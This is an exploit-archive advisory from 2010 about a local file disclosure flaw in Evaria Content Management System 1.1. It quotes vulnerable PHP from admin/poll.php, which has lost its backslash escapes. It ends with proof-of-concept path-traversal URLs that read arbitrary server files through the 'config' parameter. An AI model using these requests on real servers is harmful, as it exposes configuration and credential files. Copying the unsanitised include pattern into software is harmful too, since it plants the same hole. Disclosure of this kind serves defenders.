Evaria Content Management System 1.1 File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Evaria Content Management System 1.1 File Disclosure Vulnerability
# Published : 2010-10-01
# Author : khayeye shotor
# Previous Title : jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities
# Next Title : Zen Cart v1.3.9f (typefilter) Local File Inclusion Vulnerability

# Exploit Title: local file include / File Disclosure
# Date: 
# Author: khayeye shotor
# Software Link: http://www.evaria.com/en/?view=download&dload=1
# Version: Evaria Content Management System v.1.1
# Thanks:  khayeye sag , kandome mivei , sinehaye amam and all amehaye irani
-----------


vul code: /path/admin/poll.php

           $file_contents = file("admin/".$current_poll);
             if (((isset($vote_logging))) && (($vote_logging == 1) || ($vote_logging == 3))) {
                foreach ($file_contents as $line) {
                        if (eregi($REMOTE_ADDR, $line)) {
                           display_form();
						   echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0">n  <TR>n";
						   echo "    <TD class="poll_status" align="center">" . $already_voted . "</TD>n";
						   echo "  </TR>n</TABLE>n";
                           $set_already_voted = 1;
                           $vote_allow = 0;
                           break;
                        }
                }
             }
             if (((isset($vote_logging))) && (($vote_logging == 2) || ($vote_logging == 3))) {
                if ((isset($voted)) && ($voted == "on")) {
                   if (!$set_already_voted) {
                      display_form();
					  echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0">n  <TR>n";
					  echo "    <TD class="poll_status" align="center">" . $already_voted . "</TD>n";
					  echo "  </TR>n</TABLE>n";
                   }
                   $vote_allow = 0;
                   break;
                }
             }
             if ($vote_allow) {
                $poll_string = $vote . "|" . $REMOTE_ADDR . "n";
                $fp = fopen("admin/".$current_poll, "a");
                $string_size = strlen($poll_string);
                if (fputs($fp, $poll_string, $string_size)) {
                   display_form();
				   echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0">n  <TR>n";
				   echo "    <TD class="poll_status" align="center">" . $vote_cast . "</TD>n";
				   echo "  </TR>n</TABLE>n";
                }
                fclose($fp);
             }
          }
          break;
		  
	   case "default": 
	   display_form();
	   break;

   }
}

// Display poll form if no view is called upon...
if (!isset($mode)) {
   display_form();
}
elseif ((isset($vote) == 0) && (isset($mode))) {
   display_form();
   echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0">n  <TR>n";
   echo "    <TD class="poll_status" align="center">" . $no_selection . "</TD>n";
   echo "  </TR>n</TABLE>n";
}

function display_form() {
         global $config;
         global $no_voting;
		 global $QUERY_STRING;
         echo "<FORM name="poll" action="?" . $QUERY_STRING . "" method="post">n";
		 echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0">n";
		 echo "  <TR>n"; 
         $answers = file("admin/".$config);
------------------------------------------------

poc:
/admin/poll.php?config=../../eprint.php

/admin/poll.php?config=[local file]